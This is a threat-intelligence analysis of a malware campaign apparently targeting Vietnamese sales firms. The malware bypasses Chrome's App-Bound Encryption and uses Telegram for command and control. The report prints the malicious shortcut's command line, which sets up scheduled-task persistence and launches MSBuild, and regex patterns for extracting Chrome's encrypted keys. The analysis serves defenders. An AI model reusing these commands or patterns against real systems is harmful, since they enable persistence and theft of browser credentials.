Dual Injection Undermines Chrome’s App-Bound Encryption

Key Takeaways

• Cyble Research and Intelligence Labs (CRIL) identified malware being spread via a ZIP file containing an .LNK file disguised as a PDF and an XML project file masquerading as a PNG to trick users into opening it.
• The filename suggests that the malware is likely targeting organizations in Vietnam, particularly in the Telemarketing or Sales sectors.
• The LNK file creates a scheduled task that runs every 15 minutes, executing MSBuild.exe to deploy malicious C# code.
• The malware is capable of bypassing Chrome’s App-Bound Encryption and deploying a stealer payload to target sensitive Chrome-related files.
• Additionally, it uses the Double Injection technique to carry out fileless execution to evade detection.
• The malware establishes a connection to the Threat Actor (TA) through the Telegram Web API for command execution.
• The malware enables the TA to change the Telegram bot ID and chat ID as required, offering flexibility in controlling their communication channels.

Overview

Cyble Research & Intelligence Labs (CRIL) discovered malware potentially targeting organizations in Vietnam, especially those in the Telemarketing or Sales sectors. The initial infection vector is unknown at present.

This malware was discovered being delivered via a malicious ZIP archive containing an .LNK file disguised as a .PDF and an XML project file masquerading as a .PNG file, designed to deceive users into opening the fake PDF file. When executed, the shortcut file copies an XML project file to the Temp directory and initiates a command that creates a scheduled task running every 15 minutes. This task launches Microsoft Build Engine (MSBuild.exe) to execute embedded C# code from the XML file. The malicious code operates within the MSBuild.exe process, deploying different components based on the system’s architecture.

Upon further execution, the malware establishes communication with the TA via the Telegram Web API and listens for commands from the attacker. Depending on the specific commands received, the malware can perform several malicious activities. These include bypassing Chrome’s app-bound encryption to steal a secret encryption key, deploying a custom stealer, and exfiltrating sensitive user data from the Chrome browser, such as cookies, login data, and account login data.

Additionally, the malware allows the TA to modify the Telegram bot ID and chat ID as needed, providing flexibility in managing their communication channels. Furthermore, it can execute arbitrary commands through the Windows Command Prompt, allowing the TA to perform additional malicious activities on the infected system.

To avoid detection, the malware employs a double injection technique—Process Injection and Reflective DLL Injection—to stealthily execute malicious code in memory without leaving traces on the disk, making it harder for traditional security solutions to detect.

Infection chain:

The figure below shows the infection chain of this attack.

Technical Analysis

Upon analyzing the ZIP file – “CV Telesale Trần Huỳnh Cẩm Duyên.zip” – we found that it contains a malicious LNK file “CV_Dinh Thi Thuy.pdf.lnk” and an XML project file “logo.png”.

The attack begins with this malicious .LNK file – disguised with a .pdf extension – to deceive the user into opening it. Based on the filename, it is evident that TA is targeting individuals or organizations in Vietnam, primarily within the Telemarketing or Sales sectors.

When the user attempts to open the LNK file, it executes the following command mentioned in the shortcut’s target, which is executed via command prompt:

cmd.exe/c tar -xf Scan_document.zip|copy logo.png %temp%\darkmoon.xml &&schtasks /create /sc minute /mo 15 /tn Darkmoon_Gaming /tr “%comspec% /c powershell -nop -w h Start-Process -N -F C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe -A %temp%\darkmoon.xml” /f &&start ~logo.png

Since “Scan_document.zip” was not found during analysis, it suggests that the original ZIP archive “CV Telesale Trần Huỳnh Cẩm Duyên.zip” might have contained “Scan_document.zip” within it.

The above command copies the file “logo.png” to “%temp%\darkmoon.xml” and creates a scheduled task named “Darkmoon Gaming“, which runs every 15 minutes after being triggered. Additionally, it displays a fake error message to deceive the user into believing that the PDF failed to open.

Once the scheduled task is triggered, MSBuild.exe loads the project from the “%temp%\darkmoon.xml” file. As execution begins, the embedded C# code in the xml file performs an initial system check by verifying the number of processor cores. If the system has fewer than two CPU cores, the execution immediately halts and returns true, effectively preventing the malware from running on virtualized or low-resource environments that are often used for malware analysis.

If execution continues, the malware identifies the system architecture (32-bit or 64-bit) and locates the default installation path of MSBuild.exe. Based on this information, the malware decrypts the necessary malicious components at runtime using a combination of Base64 decoding and XOR decryption, utilizing hardcoded encryption keys embedded within the project file. This method keeps the payload obfuscated in its static form, making it more difficult for traditional security tools to detect.

The malicious components include a .NET executable that receives commands from the Threat Actor, an injector that delivers a payload capable of bypassing App Bound encryption, and a custom stealer designed to target Chrome-related files.

On a 64-bit machine, MSBuild.exe invokes the previously decrypted .NET file directly in memory using predefined parameters, ensuring execution without writing the payload into disk.

The .NET payload processes the following critical parameters:

1. Telegram Bot ID – Establishes communication with the TA’s Telegram bot for command-and-control (C2) operations.
2. Chat ID – Chat instance for sending system details and receiving commands.
3. Encrypted custom stealer – Steals sensitive information from Google Chrome, including Cookies, Login data, and Login data for Accounts, along with the encrypted Secret key.
4. Encrypted Injector– Utilizes Double injection technique to inject Reflective DLL loader into memory. The loader then injects a malicious DLL that bypasses Chrome’s app-bound encryption.

The malware first collects the victim’s username and then transmits it to the Threat Actor’s Telegram bot using the SendMessage function. To obfuscate the data, it replaces backslashes (\) with “+=…=+” and formats the message using <code> and </code> HTML tags, as shown below.

After transmitting this information, the malware enters an infinite loop, constantly awaiting a response from the Telegram bot. Upon receiving a command, it processes the input and executes the appropriate action.

Stealer Component

Upon execution, the Stealer component scans the Chrome user directory at “%LOCALAPPDATA%\Google\Chrome\User Data\Default” to locate critical files, including “Login data,” “Cookies,” and “Login Data for Accounts“. These files contain saved passwords, cookies, 2FA tokens, synced device credentials, autofill data, and other sensitive user information.

Additionally, it extracts Chrome’s encrypted secret key from the “Local State” file using a regex pattern:
“\s*.*?(?=”encrypted_key)”encrypted_key”\s*:\s*”(?<encKey>.*?)””

The extracted key is decrypted using the CryptUnprotectData Win32 API and, along with the stolen user data files, is archived into the %temp% directory for exfiltration. This decrypted key is essential for unlocking stored passwords and other encrypted browser data, enabling unauthorized access to sensitive accounts and personal information.

Injector Component

Starting from Chrome version 127, the Application-Bound Encryption method was introduced to encrypt cookies by tying them to the browser’s identity, ensuring only Chrome can access them. Subsequent versions extended this security measure to protect other sensitive data, including passwords and credentials, further preventing unauthorized decryption by external applications.

To bypass this restriction, the code in the injector component is hardcoded to target chrome_proxy.exe, located in the “\Google\Chrome\Application” directory. It launches “chrome_proxy.exe” in a suspended state using the CreateProcess API with the dwCreationFlags parameter set to CREATE_SUSPENDED.

While the process remains suspended, the injector decrypts a payload in memory, which functions as a Reflective loader. This loader is then injected into the process chrome_proxy.exe and utilizes reflective DLL injection to load the embedded payload, “DumpChromeKeyLoader.dll,” evading traditional antivirus detection.

This process effectively employs a double injection technique, where the first injection loads the Reflective Loader, and the second injection loads the final payload into the target process.

After injection, the “DumpChromeKeyLoader.dll” begins by locating the “Local State” file within the “AppData\Local\Google\Chrome\User Data” directory. This file contains critical Chrome configuration and security data, including the app_bound_encrypted_key, which is used to protect sensitive information such as cookies and saved passwords.

The malware uses a Regex pattern to locate the app_bound_encrypted_key within the Local State file. The pattern “\s*.*?(?=”app_bound_encrypted_key)”app_bound_encrypted_key”\s*:\s*”(?<encKey>.*?)” is employed to search for and extract the encrypted key. This pattern identifies the app_bound_encrypted_key string in the file and captures the encrypted key that follows it.

After extracting the encrypted key, the malware invokes the DecryptData method from GoogleChromeElevationService to obtain the decrypted key. This allows it to bypass Chrome’s Application-Bound Encryption and access protected data, including saved passwords and cookies. Once decrypted, the malware saves the extracted key to the “%temp%\ei5m013o.0fh” file for exfiltration.  

Command Execution:

The Threat Actor can also execute commands via command prompt. If the TA issues any command that does not match one of their predefined commands, it will be executed as “cmd.exe /c <command>” in hidden mode, and the output will be sent to the TA through the Telegram Web API, as shown below.

Exfiltration:

After executing each command, the malware transmits the output or any errors to the Threat Actor (TA) via the Telegram Web API. This real-time communication allows the attacker to monitor execution results and adjust commands accordingly.

Conclusion:

This attack leverages fileless execution, scheduled task persistence, and Telegram-based communication to evade detection while stealing sensitive data. By exploiting MSBuild.exe and using a double injection technique, the malware executes directly in memory, making it harder to detect. Its ability to bypass Chrome’s Application-Bound Encryption and extract credentials further strengthens its impact. The use of Telegram Web API for exfiltration and dynamic bot ID switching ensures continued control over infected systems.

MITRE ATT&CK® Techniques

Recommendations:

• Train users to recognize suspicious file extensions and avoid opening files from untrusted sources. Implement strict email filtering to block potentially harmful attachments.
• Use application whitelisting to prevent the execution of unauthorized files, particularly .LNK and .exe files. Enforce strict control over file execution paths and extensions.
• Deploy endpoint detection and response (EDR) tools that monitor and block suspicious activities, such as reflective DLL injection or the creation of scheduled tasks by unauthorized processes.
• Keep operating systems, browsers, and other software up to date with the latest security patches. This reduces the risk of exploits targeting known vulnerabilities.
• Enforce the principle of least privilege by ensuring that users and processes have access to the minimum necessary resources. This limits malware’s ability to escalate privileges and access sensitive data.

Indicators of Compromise (IoCs):

Related